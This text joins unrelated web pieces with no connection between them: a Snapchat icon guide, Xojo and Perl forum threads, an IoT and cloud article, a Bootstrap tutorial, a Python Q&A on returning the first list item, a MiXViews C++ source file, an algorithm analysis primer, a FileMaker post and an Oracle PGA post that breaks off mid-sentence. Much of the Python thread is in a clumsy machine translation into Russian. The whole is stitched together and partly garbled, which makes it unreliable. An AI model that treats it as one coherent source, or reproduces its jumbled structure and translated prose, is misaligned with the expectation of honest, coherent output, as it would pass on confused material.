1. Red Arrow Icon

The red arrow icon on Snapchat shows that you have sent your friend a snap that does not contain audio; basically, it's just an image. Until your friend sees your snap, it will appear as a solid red arrow.
Once the snap has been seen, it will turn into a hollow arrow with a red boundary.

2. Purple Arrow Icon

Similar to the red arrow, the purple arrow appears when you successfully send a snap with audio (basically, a video) to your friends on Snapchat. If your friend has not seen the snap, it will appear as a solid purple arrow, and it will turn into a hollow purple arrow after your friend has seen it.

3. Blue Arrow Icon

The blue arrow icon appears when you send a chat message to your Snapchat friends. Once your friend sees the message, it will appear as a hollow arrow with a blue boundary.

4. Red Square Icon

If a friend sends a snap to you and the icon appears as a red square, it means that the snap does not contain any audio. It can be either a video or an image, excluding audio.

5. Purple Square Icon

Contrary to the red square, if a purple square appears when you receive a snap from your friends, it means that the snap includes audio. In other words, it's simply going to be a video.

6. Blue Square Icon

Unlike the red square or purple square, the blue square icon looks more like a message icon, and you can easily figure out that your friend has sent you a normal text message or shared a media file in the personal message window.

7. Interlaced Arrow Icon

Interlaced arrow icons of all three colors mean that your friend has seen whatever you have sent, whether an image, a chat message, or a video, and has taken a screenshot of it.

How to Customize Your Friend Emojis?

Although the currently implemented Friend emojis are quite good and easy to understand, there might be some people who don't like them that much and want to change the emojis shown beside their friends' names. You'll be glad to know that you can completely customize the Friend emojis and set whatever you want to see on your Snapchat. However, it is not going to change anything on your friend's side; this change of emojis will only appear on your Snapchat. So, let's learn how to customize your Friend emojis on Snapchat.

Step 1. First of all, launch the Snapchat app.
Step 2. In the top-left corner, there will be your Bitmoji icon; tap on it.
Step 3. Once you tap on your Bitmoji icon, it will open the Profile menu.
Step 4. Here, tap on the Settings icon, which is present at the top-right corner.
Step 5. Inside the Settings window, scroll down till you find the Additional Services tab, then tap on the Customise Emojis button.
Step 6. The Snapchat emoji chart will appear here; you can tap on any emoji and change it to whatever you like.

After you make these changes, the Friend emoji changes will appear only on your Snapchat. Everything will remain set to the default for other people.

Conclusion

As you can see by reading this article, Snapchat is a unique social media platform. Not because it has some complications, but because the way it has used common emojis to improve the user experience is something we believe every other social media platform should do. Not only does it look good, but the emojis on Snapchat have various meanings that make the app quite interesting to use.

We hope we have covered most people's doubts regarding the Snapchat emojis. In case you think we have left something out, or you have some queries regarding Snapchat,
feel free to ask us in the comments section. And don't forget to share this article with your friends who are new to Snapchat; it'll be a great help for them as well.
Creating a new variable type?

I put this in OS X since I found this in MacOSLib. For a recent project, I had to use CFURL to call a Cocoa declare, but that particular type does not exist natively in Xojo. However, I noticed that MacOSLib had the type CFURL, and even uses it just like a native type, as in:

dim base as CFURL = me.BaseURL

Being able to create new types like that which seem to be usable like other types is a fascinating possibility that could vastly simplify coding. I tried to understand how this works, but the way it is built into MacOSLib is so arborescent, with internal calls to hundreds of methods and properties, that I was unable to really grasp the essentials. I see that CFURL is a global class within the CoreFoundation module, but I got lost trying to understand how a class can take a value directly like a variable, possibly with implicit conversion. I will appreciate any possible insight. TIA

Read the docs about Operator_Convert.

That is nice, but it does not seem to allow creating a new type beyond existing ones.

It's what is used in MacOSLib. If you look at the declare itself, the parameter will be a Ptr. Using Operator_Convert, the object, in this case CFURL, returns the pointer to the represented object created in declares. That's all that is happening; there is no other magic going on behind the scenes. Every time a declare is used with an object instance in MacOSLib, Operator_Convert returns the pointer. In this case the same effect would be accomplished if, instead of using just the instance, you used "instance.id", which also returns the pointer. Hopefully that makes sense.

Assuming 'me' is a CFURL, I don't see any Operator_Convert going on. CFURL.BaseURL is a computed property that returns a CFURL, which is stored in the variable base.

CFURL is a class. CFType is its super class. CFType has a property called "Handle", which is of type CFTypeRef structure. CFTypeRef is a structure which consists of only one field, "value", which is of type Ptr.

Thank you. I understand better now.
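For readers coming from other languages, Python's ctypes has a close analogue to this pattern: an object can expose an _as_parameter_ attribute, and ctypes substitutes that value whenever the object is passed to a foreign function, much like Operator_Convert handing a Ptr to a declare. A minimal sketch (the wrapper class is invented for illustration, and loading libc this way assumes a POSIX system):

import ctypes

class Handle:
    """Wraps a raw pointer; ctypes passes _as_parameter_ to C functions."""
    def __init__(self, ptr: int):
        self._as_parameter_ = ctypes.c_void_p(ptr)

libc = ctypes.CDLL(None)  # load the C runtime (POSIX)
buf = ctypes.create_string_buffer(b"hello")
h = Handle(ctypes.addressof(buf))

# The wrapper object can be used directly where a pointer is expected:
libc.strlen.restype = ctypes.c_size_t
print(libc.strlen(h))  # -> 5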
Extracting a word from a line in an array

EmilyB, Member, Posts: 1

Hello. I am new to Perl programming and I have what may be a simple question! I need to write code to pull a number out of a line in a file. The number is never in exactly the same spot and the numbers are not the same length, but there is always the same word right in front. For example:

dogs Dachshund X732i AnimalNum:[b]Q21097[/b] ens2 trip1
cats kitty z898 AnimalNum:[b]IS2193[/b] arg32 bfn1

The portion I'm looking for is in bold. I have code that reads the file into an array and then searches for, say, Dachshund or kitty, finds the line that has that entry, and then I need it to give me the AnimalNum.

[code]
foreach my $line (@animal_list){
  if ($line =~ /$var/){       # $var = Dachshund or kitty
    if ($line =~ /$var2/){    # $var2 = AnimalNum
      print OUTPUTF "$line ";
      # now I need to find the AnimalNum that is in $line
    }
[/code]

How would I search for the word AnimalNum and then take the ID number directly after it?

Comments

• Jonathan, Member, Posts: 2,914

Hi,

You need to use parens to write a capture. Something like:

[code]$line =~ /AnimalNum:(\S+)/;
my $number = $1;[/code]

Jonathan

### for(74,117,115,116){$::a.=chr};(($_.='qwertyui')&& (tr/yuiqwert/her anot/))for($::b);for($::c){$_.=$^X; /(p.{2}l)/;$_=$1}$::b=~/(..)$/;print("$::a$::b $::c hack$1.");
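The same capture translates almost one-for-one into Python's re module, which may help if you're comparing idioms across languages (the sample line below reuses the thread's data with the BBCode bold markers removed):

import re

line = "dogs Dachshund X732i AnimalNum:Q21097 ens2 trip1"
m = re.search(r"AnimalNum:(\S+)", line)  # \S+ = the run of non-space after the label
if m:
    print(m.group(1))  # -> Q21097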
The Internet of Things and the Cloud Back in the 1970s, it was popular for businesses to rent time using big, mainframe computer systems. These systems were extremely large and expensive, so it didn’t make sense financially for businesses to own the computing power themselves. Instead, they were owned by large corporations, government agencies, and universities. Microprocessor technology allowed for great reductions in size and expense, leading to the advent of the personal computer, which exploded in popularity in the 1980s. Suddenly, businesses could (and did) bring computation in-house. However, as high-speed connections have become widespread, the trend has reversed: businesses are once again renting computing power from other organizations. But why is that? Instead of buying expensive hardware for storage and processing in-house, it’s easy to rent it for cheap in the cloud. The cloud is a huge, interconnected network of powerful servers that performs services for businesses and for people. The largest cloud providers now in the US are Amazon, Google, and Microsoft, who have huge farms of servers that they rent to businesses as part of their cloud services. For businesses that have variable needs (most of the time they don’t need much computing, but every now and then they need a lot), this is cost effective because they can simply pay as-needed. When it comes to people, we use these cloud services all of the time. You might store your files in Google Drive instead of on your personal computer. Google Drive, of course, uses Google’s cloud services. Or you might listen to songs on Spotify instead of downloading the songs to your computer or phone. Spotify uses Amazon’s cloud services. Generally, something that happens “in The Cloud” is any activity that takes place over an internet connection instead of on the device itself. The Internet of Things and the Cloud Because activities like storage and data processing take place in the cloud rather than on the device itself, this has had significant implications for IoT. Many IoT systems make use of large numbers of sensors to collect data and then make intelligent decisions (want to know how an IoT system actually works?). Using the cloud is important for aggregating data and drawing insights from that data. For instance, a smart agriculture company would be able to compare soil moisture sensors from Kansas and Colorado after planting the same seeds. Without the cloud, comparing data across wider areas is much more difficult. Using the cloud also allows for high scalability. When you have millions of sensors, putting large amounts of computational power on each sensor would be extremely expensive and energy intensive. Instead, data can be passed to the cloud from all these sensors and processed there in aggregate. For much of IoT, the head (or rather, the brain) of the system is in the cloud. Sensors and devices collect data and perform actions, but the processing/commanding/analytics (aka the “smart” stuff), typically happens in the cloud. So is the cloud necessary for IoT? Technically, the answer is no. The data processing and commanding could take place locally rather than in the cloud via an internet connection. Known as “fog computing” or “edge computing”, this actually makes a lot of sense for some IoT applications. However, there are substantial benefits to be had using the cloud for many IoT applications. Choosing not to use the cloud would significantly slow the industry due to the increased costs. 
Importantly, cost and scalability aren't the only factors. This brings us to a more difficult question…

Is the cloud desirable for IoT?

So far we've only been discussing the benefits of using the cloud for IoT. Let's briefly summarize them before exploring the concerns:

• Decreased costs, both upfront and in infrastructure
• Pay-as-needed storage and computing
• High system scalability and availability
• Increased lifespan of battery-powered sensors/devices
• Ability to aggregate large amounts of data
• Anything with an internet connection can become "smart"

However, there are legitimate concerns with cloud usage:

Data ownership. When you store data in a company's cloud service, do you own the data, or does the cloud provider? This can be hugely important for IoT applications involving personal data, such as healthcare or smart homes.

Potential crashes. If the connection is interrupted or the cloud service itself crashes, the IoT application won't work. Short-term inoperability might not be a big deal for certain IoT applications, like smart agriculture, but it could be devastating for others. You don't want applications involving health or safety crashing for even a few seconds, let alone a few hours.

Latency. It takes time for data to be sent to the cloud and for commands to return to the device. In certain IoT applications, such as health and safety, these milliseconds can be critical. A good example is autonomous vehicles. If a crash is imminent, you don't want the car to have to wait to talk to the cloud before deciding to swerve out of the way.

So when we ask if the cloud is desirable for IoT: it depends. The Internet of Things is a broad field and includes an incredible variety of applications. There is no one-size-fits-all solution, so IoT companies need to consider their specific application when deciding whether the cloud makes sense for them. That's actually one of the reasons my company Leverage exists: to help companies who want to build an IoT solution navigate the entire process.

Edited by Ken Briodagh

Source: The Internet of Things and the Cloud
How to Vertically Align a DIV in Bootstrap?

The vertical alignment utilities are used to align elements vertically on the webpage: they set the vertical alignment of inline, inline-block, inline-table, and table-cell elements. They cannot be used to vertically align block elements like div. For vertically aligning div elements, we need to use the flexbox utilities. Let's understand this with examples.

Using flexbox alignment utilities

To align div elements vertically, use the align-items classes. We can vertically align items to the start, center, end, baseline, or stretch them.

Example: Vertically align div elements

In this example, we will vertically align div items using the align-items classes.

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Bootstrap Example</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/[email protected]/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js"></script>
</head>
<body>
  <div class="container">
    <h2>Vertical align div items</h2>
    <div class="d-flex align-items-start bg-info" style="height: 80px;">
      <div class="p-2 border border-light">Flex item 1</div>
    </div>
    <br>
    <div class="d-flex align-items-end bg-info" style="height: 100px;">
      <div class="p-2 border border-light">Flex item 1</div>
    </div>
    <br>
    <div class="d-flex align-items-center bg-info" style="height: 80px;">
      <div class="p-2 border border-light">Flex item 1</div>
    </div>
    <br>
    <div class="d-flex align-items-baseline bg-info" style="height: 80px;">
      <div class="p-2 border border-light">Flex item 1</div>
    </div>
    <br>
    <div class="d-flex align-items-stretch bg-info" style="height: 80px;">
      <div class="p-2 border border-light">Flex item 1</div>
    </div>
  </div>
</body>
</html>

Output

Here is the output of the above example.

Example: Add a responsive variation to vertically align div items

We can also add responsive variations when vertically aligning div elements. For example, .align-items-md-center centers the items only at the medium breakpoint and up; swap it in for .align-items-center in the markup above to make the alignment responsive.

Conclusion

Here, we learned how to vertically align a div in Bootstrap 5. The vertical alignment utilities cannot be used to align div items, so we need to use the align-items classes from flexbox. Responsive variations are also available for div alignment.
Python idiom to return the first item or None

I'm sure there's a simpler way of doing this that just isn't occurring to me. I'm calling a bunch of methods that return a list. The list may be empty. If the list is non-empty, I want to return the first item; otherwise, I want to return None. This code works:

my_list = get_list()
if len(my_list) > 0:
    return my_list[0]
return None

It seems to me that there should be a simple one-line idiom for this, but for the life of me I can't think of it. Is there one?

Edit: The reason I'm looking for a one-line expression here is not that I like incredibly terse code, but because I have to write a lot of code like this:

x = get_first_list()
if x:
    # do something with x[0]
    # inevitably forget the [0] part, and have a bug to fix
y = get_second_list()
if y:
    # do something with y[0]
    # inevitably forget the [0] part AGAIN, and have another bug to fix

What I'd like to be doing can, of course, be accomplished with a function (and probably will be):

def first_item(list_or_none):
    if list_or_none:
        return list_or_none[0]

x = first_item(get_first_list())
if x:
    # do something with x
y = first_item(get_second_list())
if y:
    # do something with y

I posted the question because I'm often surprised by what simple expressions in Python can do, and I thought writing a function was a silly thing to do if there was a simple expression that could do the trick. But seeing these answers, it seems like a function IS the simple solution.

+149 · 23 answers

Python 2.6+:

next(iter(your_list or []), None)

Python 2.4:

def get_first(iterable, default=None):
    if iterable:
        for item in iterable:
            return item
    return default

Example:

x = get_first(get_first_list())
if x:
    ...
y = get_first(get_second_list())
if y:
    ...

Another option is to inline the above function:

for x in get_first_list() or []:
    # process x
    break  # process at most one item

for y in get_second_list() or []:
    # process y
    break

To avoid the break, you can write:

for x in yield_first(get_first_list()):
    x  # process x
for y in yield_first(get_second_list()):
    y  # process y

Where:

def yield_first(iterable):
    for item in iterable or []:
        yield item
        return

+68

The best way:

a = get_list()
return a[0] if a else None

You can also do it in one line, but it's much harder for the programmer to read:

return (get_list()[:1] or [None])[0]

+158

(get_list() or [None])[0]

That should work. BTW, I didn't use the variable name list, because that shadows the built-in list() function.

Edit: I had a slightly simpler, but wrong, version here earlier.

+44

The most idiomatic Python way is to use next() on an iterator, since a list is iterable. Just as @J.F.Sebastian put it in a comment on Dec 13, 2011:

next(iter(the_list), None)

This returns None if the_list is empty. See next() (Python 2.6+).

Or, if you know for sure that the_list is not empty:

iter(the_list).next()

See iterator.next() (Python 2.2+).

+27

The OP's solution is almost there; there are just a few things to make it more Pythonic.

First, there's no need to get the length of the list. Empty lists in Python evaluate to False in an if check. Just say

if list:

Additionally, it's a very bad idea to assign to variables that shadow built-in names. "list" is a built-in in Python.
Итак, измените это на some_list = get_list() if some_list: На самом деле важным моментом является то, что здесь много недостатков: все функции/методы Python возвращают None по умолчанию. Попробуйте следующее. def does_nothing(): pass foo = does_nothing() print foo Если вам не нужно возвращать None для прекращения функции раньше, нет необходимости явно возвращать None. Вкратце, просто верните первую запись, если она существует. some_list = get_list() if some_list: return list[0] И, наконец, возможно, это было подразумевается, но только для того, чтобы быть явным (потому что явный лучше, чем неявный), вы не должны иметь свою функцию получить список из другой функции; просто передайте его в качестве параметра. Итак, конечным результатом будет def get_first_item(some_list): if some_list: return list[0] my_list = get_list() first_item = get_first_item(my_list) Как я уже сказал, OP был почти там, и только несколько касаний придают ему аромат Python, который вы ищете. +9 источник Если вы обнаружите, что пытаетесь перенести первое (или Нет) из понимания списка, вы можете переключиться на генератор, чтобы сделать это, как: next((x for x in blah if cond), None) Pro: работает, если blah не индексируется. Con: это незнакомый синтаксис. Это полезно при взломе и фильтрации файлов в ipython. +7 источник for item in get_list(): return item +3 источник Для этого есть еще одна возможность. return None if not get_list() else get_list()[0] Преимущество: Этот метод обрабатывает случай, когда get_list - None, без использования try/except или assign. Насколько мне известно, ни одна из вышеперечисленных реализаций не может справиться с этой возможностью. крушения: get_list() вызывается дважды, совершенно ненужно, особенно если список длинный и/или создан при вызове функции. По правде говоря, это больше "Pythonic", на мой взгляд, для обеспечения кода, который читабельен, чем для создания однострочного интерфейса только потому, что вы можете:) Я должен признать, что я виноват во многих случаях ненужного уплотнения Python код просто потому, что меня так впечатлило, насколько мал я могу сделать сложную функцию:) Изменить: Как уже упоминалось пользователем "hasen j", условное выражение выше является новым в Python 2.5, как описано здесь: https://docs.python.org/whatsnew/2.5.html#pep-308. Спасибо, hasen! +2 источник Идиома Python для возврата первого элемента или None? Самый питоновский подход - это то, что продемонстрировал самый верный ответ, и это было первое, что приходило мне в голову, когда я читал вопрос. Здесь, как использовать его, сначала, если возможно пустой список передается в функцию: def get_first(l): return l[0] if l else None И если список возвращается из функции get_list: l = get_list() return l[0] if l else None Другие способы продемонстрировали это здесь, с пояснениями for Когда я начал думать о умных способах сделать это, это вторая вещь, о которой я думал: for item in get_list(): return item Это предполагает, что функция заканчивается здесь, неявно возвращая None, если get_list возвращает пустой список. Ниже явный код в точности эквивалентен: for item in get_list(): return item return None if some_list Было также предложено следующее (я исправил неправильное имя переменной), который также использует неявный None. Это было бы предпочтительнее вышеизложенного, поскольку он использует логическую проверку вместо итерации, которая может не произойти. Это должно быть проще сразу понять, что происходит. 
Но если мы пишем для удобства чтения и обслуживания, мы также должны добавить явный return None в конец: some_list = get_list() if some_list: return some_list[0] slice or [None] и выберите нулевой индекс Этот вопрос также находится в самом верном ответе: return (get_list()[:1] or [None])[0] Срез не нужен и создает дополнительный список из одного элемента в памяти. Следующее должно быть более результативным. Чтобы объяснить, or возвращает второй элемент, если первый False в булевом контексте, поэтому, если get_list возвращает пустой список, выражение, содержащееся в круглых скобках, вернет список с "None", который затем доступ к индексу 0: return (get_list() or [None])[0] Следующий использует тот факт, что и возвращает второй элемент, если первый True в булевом контексте, и поскольку он дважды ссылается на my_list, это не лучше, чем тройное выражение (и технически не однострочный ): my_list = get_list() return (my_list and my_list[0]) or None next Тогда мы имеем следующее умное использование встроенных next и iter return next(iter(get_list()), None) Чтобы объяснить, iter возвращает итератор с помощью метода .next. (.__next__ в Python 3.) Затем встроенный next вызывает этот метод .next, и если итератор исчерпан, возвращает значение по умолчанию, которое мы даем, None. избыточное тернарное выражение (a if b else c) и обратная связь Было предложено нижеследующее, но наоборот было бы предпочтительным, так как логика обычно лучше понимается в положительном, а не отрицательном. Поскольку get_list вызывается дважды, если результат каким-то образом не замечен, это будет плохо работать: return None if not get_list() else get_list()[0] Лучше обратное: return get_list()[0] if get_list() else None Еще лучше, используйте локальную переменную, так что get_list вызывается только один раз, и у вас есть рекомендуемое решение Pythonic, которое обсуждалось вначале: l = get_list() return l[0] if l else None +2 источник Честно говоря, я не думаю, что есть более совершенная идиома: вы понятны и кратки - не нужно ничего "лучше". Возможно, но это действительно вопрос вкуса, вы можете изменить if len(list) > 0: на if list: - пустой список всегда будет оценивать значение False. В соответствующей заметке, Python не Perl (не предназначен для каламбуров!), вам не нужно получать самый крутой код. На самом деле, худший код, который я видел в Python, тоже был очень классным:-) и совершенно не поддающийся оценке. Кстати, большинство решений, которые я видел здесь, не учитывают, когда список [0] оценивается как False (например, пустая строка или ноль) - в этом случае все они возвращают None, а не правильный элемент. +1 источник Из любопытства я провел тайминги по двум решениям. Решение, которое использует оператор return для преждевременного завершения цикла for, немного дороже на моей машине с Python 2.5.1, я подозреваю, что это связано с настройкой итерации. 
import random import timeit def index_first_item(some_list): if some_list: return some_list[0] def return_first_item(some_list): for item in some_list: return item empty_lists = [] for i in range(10000): empty_lists.append([]) assert empty_lists[0] is not empty_lists[1] full_lists = [] for i in range(10000): full_lists.append(list([random.random() for i in range(10)])) mixed_lists = empty_lists[:50000] + full_lists[:50000] random.shuffle(mixed_lists) if __name__ == '__main__': ENV = 'import firstitem' test_data = ('empty_lists', 'full_lists', 'mixed_lists') funcs = ('index_first_item', 'return_first_item') for data in test_data: print "%s:" % data for func in funcs: t = timeit.Timer('firstitem.%s(firstitem.%s)' % ( func, data), ENV) times = t.repeat() avg_time = sum(times) / len(times) print " %s:" % func for time in times: print " %f seconds" % time print " %f seconds avg." % avg_time Это тайминги, которые я получил: empty_lists: index_first_item: 0.748353 seconds 0.741086 seconds 0.741191 seconds 0.743543 seconds avg. return_first_item: 0.785511 seconds 0.822178 seconds 0.782846 seconds 0.796845 seconds avg. full_lists: index_first_item: 0.762618 seconds 0.788040 seconds 0.786849 seconds 0.779169 seconds avg. return_first_item: 0.802735 seconds 0.878706 seconds 0.808781 seconds 0.830074 seconds avg. mixed_lists: index_first_item: 0.791129 seconds 0.743526 seconds 0.744441 seconds 0.759699 seconds avg. return_first_item: 0.784801 seconds 0.785146 seconds 0.840193 seconds 0.803380 seconds avg. +1 источник Как насчет этого: (my_list and my_list[0]) or None Примечание.. Это должно хорошо работать для списков объектов, но может привести к неправильному отвечу в случае номера или списка строк в комментариях ниже. +1 источник try: return a[0] except IndexError: return None 0 источник def head(iterable): try: return iter(iterable).next() except StopIteration: return None print head(xrange(42, 1000) # 42 print head([]) # None Кстати: я бы переработал ваш общий программный поток в нечто вроде этого: lists = [ ["first", "list"], ["second", "list"], ["third", "list"] ] def do_something(element): if not element: return else: # do something pass for li in lists: do_something(head(li)) (избегая повторения, когда это возможно) 0 источник Что касается идиом, существует рецепт itertools под названием nth. Из рецептов itertools: def nth(iterable, n, default=None): "Returns the nth item or a default value" return next(islice(iterable, n, None), default) Если вам нужны однострочные шрифты, подумайте об установке библиотеки, которая реализует этот рецепт для вас, например. more_itertools: import more_itertools as mit mit.nth([3, 2, 1], 0) # 3 mit.nth([], 0) # default is `None` # None Доступен еще один инструмент, который возвращает только первый элемент, называемый more_itertools.first. mit.first([3, 2, 1]) # 3 mit.first([], default=None) # None Эти itertools масштабируются в общем случае для любого итеративного, а не только для списков. 0 источник Вы можете использовать Извлечь метод. Другими словами, извлеките этот код в метод, который вы тогда вызывали. Я бы не пытался сжимать его гораздо больше, один лайнеры кажутся более трудными для чтения, чем подробная версия. 
И если вы используете метод извлечения, это один лайнер;) -1 источник Использование и/или трюка: a = get_list() return a and a[0] or None -1 источник Несколько человек предложили сделать что-то вроде этого: list = get_list() return list and list[0] or None Это работает во многих случаях, но работает, только если список [0] не равен 0, False или пустой строке. Если список [0] равен 0, False или пустой строке, метод будет неправильно возвращать None. Я создал эту ошибку в своем собственном коде слишком много раз! -1 источник А как насчет: next(iter(get_list()), None)? Не может быть самым быстрым здесь, но является стандартным (начиная с Python 2.6) и кратким. -1 источник Возможно, это не самое быстрое решение, но никто не упомянул этот вариант: dict(enumerate(get_list())).get(0) Если get_list() может вернуться None, вы можете использовать: dict(enumerate(get_list() or [])).get(0) Преимущества: -one line - вы просто вызываете get_list() один раз - легко понять -1 источник Моим вариантом использования было установить значение локальной переменной. Лично я нашел попытку и, кроме очистителя стилей, читать items = [10, 20] try: first_item = items[0] except IndexError: first_item = None print first_item чем нарезка списка. items = [10, 20] first_item = (items[:1] or [None, ])[0] print first_item -1 источник if mylist != []: print(mylist[0]) else: print(None) -1 источник не является идиоматическим питоном, эквивалентным тройным операторам типа C cond and true_expr or false_expr т. list = get_list() return list and list[0] or None -2 источник Посмотрите другие вопросы по меткам или Задайте вопрос
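One postscript not in the original thread: here is a small self-contained check (my addition, written for Python 3) that makes the falsy-first-element pitfall from several answers concrete. The ternary, or-default, and next idioms all survive a falsy first element, while the and/or trick does not:

    def first_ternary(lst):
        return lst[0] if lst else None

    def first_or(lst):
        return (lst or [None])[0]

    def first_next(lst):
        return next(iter(lst), None)

    def first_and_or(lst):  # the buggy idiom several answers warn about
        return (lst and lst[0]) or None

    for lst in ([], ['a', 'b'], [0, 1], ['']):
        print(lst, first_ternary(lst), first_or(lst),
              first_next(lst), first_and_or(lst))
    # For [0, 1] and [''], first_and_or wrongly returns None,
    # while the other three correctly return 0 and ''.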
File: datatype.C (from the Debian "mixviews" 1.20-10.1 source package; 55 lines)

// datatype.C
/******************************************************************************
*
*  MiXViews - an X window system based sound & data editor/processor
*
*  Copyright (c) 1993, 1994 Regents of the University of California
*
*  Author: Douglas Scott
*  Date: December 13, 1994
*
*  Permission to use, copy and modify this software and its documentation
*  for research and/or educational purposes and without fee is hereby granted,
*  provided that the above copyright notice appear in all copies and that
*  both that copyright notice and this permission notice appear in
*  supporting documentation. The author reserves the right to distribute this
*  software and its documentation. The University of California and the author
*  make no representations about the suitability of this software for any
*  purpose, and in no event shall University of California be liable for any
*  damage, loss of data, or profits resulting from its use.
*  It is provided "as is" without express or implied warranty.
*
******************************************************************************/

#ifdef __GNUG__
#pragma implementation
#endif

#include <math.h>
#include "datatype.h"
#include "sndconfig.h"

const DataType::TypeInfo DataType::typeInfo[] = {
//    bits  bytes  format          name
	{  0,   0,    0,              "unknown type" },
	{  8,   1,    CHAR_FORMAT,    "8-bit linear" },
	{  8,   1,    CHAR_FORMAT,    "8-bit unsigned" },
	{  8,   1,    ALAW_FORMAT,    "8-bit a-law" },
	{  8,   1,    MULAW_FORMAT,   "8-bit u-law" },
	{ 16,   2,    SHORT_FORMAT,   "16-bit linear" },
	{ 32,   4,    INT_FORMAT,     "32-bit integer" },
	{ 32,   4,    FLOAT_FORMAT,   "floating point" },
	{ 64,   8,    DOUBLE_FORMAT,  "double precision float" }
};

// Map a power-of-two type code to a table index: the index counts
// how many times the code can be halved (0 and 1 both map to index 0).
DataType::DataType(int itype) : typeIndex(0) {
	if(itype == 0)
		typeIndex = 0;
	while(itype > 1) {
		itype >>= 1;
		typeIndex++;
	}
}

// Convert the index back to a code: index 0 yields 0, index n yields 2^(n-1).
DataType::operator int () {
	return (typeIndex == 0) ? 0 : int(pow(2.0, typeIndex - 1));
}
What is Algorithm Analysis?

Algorithm analysis is a field of computer science devoted to understanding the complexity of algorithms. Algorithms are generally defined as processes that perform a series of operations to reach an end. Algorithms can be expressed in many ways: as flowcharts, in a natural language, and in computer programming languages. Algorithms are used in mathematics, computing, and linguistics, but their most common use is in computers, to perform calculations or to process data. Algorithm analysis deals with algorithms written in computer programming languages, which are based on mathematical formalism.

An algorithm is essentially a set of instructions for a computer to perform a calculation in a particular way. For example, a computer would use an algorithm to calculate an employee's paycheck. For the computer to perform the calculation, it needs the appropriate data entered into the system, such as the employee's wage rate and the number of hours worked. More than one algorithm may work to perform the same operation, but some algorithms use more memory and take longer to execute than others. So how do we know how well algorithms work in general, given the differences between computers and data inputs? This is where algorithm analysis comes in.

One way to test an algorithm is to run a computer program and see how well it works. The problem with this approach is that it only tells us how well the algorithm works on a particular computer with a particular set of inputs. The purpose of algorithm analysis is to test and then draw conclusions about how well a particular algorithm works in general. Doing this on individual computers would be very difficult and time-consuming, so researchers design models of computer operation to test algorithms against.

In general, algorithm analysis is most concerned with finding out how much time a program takes to run, and how much memory storage space it needs to execute. In particular, computer scientists use algorithm analysis to determine how the data fed into a program affects its total running time, how much memory space the computer needs for program data, how much space the program's code takes up in the computer, whether an algorithm produces correct calculations, how complex a program is, and how well it handles unexpected results.
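The cost contrast described above is easy to see in practice. Below is a short, self-contained Python sketch (my addition, not part of the original article) comparing two algorithms that compute the same sum, one in linear time and one in constant time:

    import timeit

    def sum_linear(n):
        # O(n): touches every integer from 1 to n
        total = 0
        for i in range(1, n + 1):
            total += i
        return total

    def sum_constant(n):
        # O(1): closed-form formula, same result at any input size
        return n * (n + 1) // 2

    assert sum_linear(10_000) == sum_constant(10_000)

    for n in (1_000, 10_000, 100_000):
        t_lin = timeit.timeit(lambda: sum_linear(n), number=100)
        t_con = timeit.timeit(lambda: sum_constant(n), number=100)
        print(f"n={n:>7}: linear {t_lin:.4f}s, constant {t_con:.6f}s")

The linear version's running time grows with n while the formula's stays flat, which is exactly the kind of conclusion algorithm analysis lets us draw without testing every computer and input.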
Recreating FileMaker Found Sets

The Perform Script on Server (PSoS) script step is an extraordinarily powerful tool for speeding up processing in FileMaker, but it poses a challenge to go along with its power: since the processes run on the server, the results are not always available to the client. Imagine a situation where the server is finding a set of data and doing some type of update on the found records. Now imagine the end user needing to recreate that found set on the client. The user will need a way to identify the records modified by the server, gather that info, and recreate the find on the client.

Imaginative developers have devised several ways to retrieve sets of records from the PSoS script step but, until now, there hasn't been a deep analysis of which way works fastest under varying conditions.

Enter Mislav Kos, of Soliant Consulting. Kos spent a considerable amount of time testing different methods under different conditions and with very large data sets, and the results are worth studying:

"As I alluded to already, the List of Find method is quite slow. The GTRR method is fast, with number IDs performing considerably faster than text. The Snapshot Find method performs the fastest when the found set is configured according to the 'best case', requiring just a single find request. But when the found set is set up according to the 'worst case', the performance is comparable to the List of Find method. (It's a bit faster, because getting the list of internal record IDs from the snapshot is faster, but it's still brutally slow.) The answer is a bit unsatisfying, because for the Snapshot Find method, the data is shown for the 'best case' and the 'worst case', and not for the 'typical case'. But the typical case would be difficult to reliably reconstruct in a test environment, so I had to resort to a best/worst-case type of analysis...."

(Figure: test results of the PSoS found-set methods.)

There are some other interesting points to consider from the post:

- When the script parameter for Perform Script on Server exceeds 1 million characters, Error 513 is generated
- Using UUID Text fields for the primary key results in a much smaller file than using standard Number type serial number fields
- Primary keys of the Text type process much more slowly than Number type fields
- There is a limit to the number of records that can be accessed using the Go To Related Record (GTRR) function
- One commenter thought of another way to collect the values and return them... I'll bet others find more ways, too

Finally, and incredibly, Kos built a robust, downloadable demo file that allows users to do their own testing under different conditions and with different parameters. Thanks, Mislav!

Source: Recreating a FileMaker Found Set | Soliant Consulting
Why Oracle Works the Way it Does (7) - The PGA

Last time, we discussed some of the shared memory components in Oracle. This time we'll talk about Oracle's private parts (hey! get your mind out of the gutter). Specifically, let's talk about the Program Global Area (PGA). We are going to assume a dedicated server connection to the database (like last time).

So, it's easy to see where we'll get some increases in performance and scalability by using the SGA properly. Can we get similar benefits from the PGA? Well, kinda. It depends on whether your developers and designers know what they're doing or not. Design obviously affects shared resources as well, but shared resources don't keep copying the same mistake(s) for every server process!

First let me just name a few pieces of the PGA:

- Oracle code (the size of this is OS specific, and the only thing you can do to affect it is change OSes)
- a persistent area (once allocated, sticks around for the life of that session, or until you CLOSE some things)
- a runtime area (deallocated after the execution phase is complete)

Oracle Code

Since there's nothing you can do about this piece other than migrating to another OS, all you can really do is be aware of it. BUT, if you investigate this in your OS-specific documentation, you could find that the Oracle software code area on your OS is 2 megs per dedicated server. On another OS, you may find it is only 1 meg per dedicated server. So, depending on your OS, you could be doubling the startup size of your PGA. This is memory that is allocated from the OS for the private use of that PGA.

-----------------------------------
Two things to think about here if you need to scale to a high number of users: consider using SHARED SERVERS (formerly MTS) to greatly reduce the size (by reducing the number) of the PGAs; or, if you prefer to/must use DEDICATED SERVERS, install on an OS that has a smaller code area requirement. Just think about it, don't use it as a rule of thumb.
-----------------------------------

Persistent Area

This part of the PGA does not go away until you tell it to. It holds things like bind variables. You DO know what a bind variable is, right? What's the difference between these two statements:

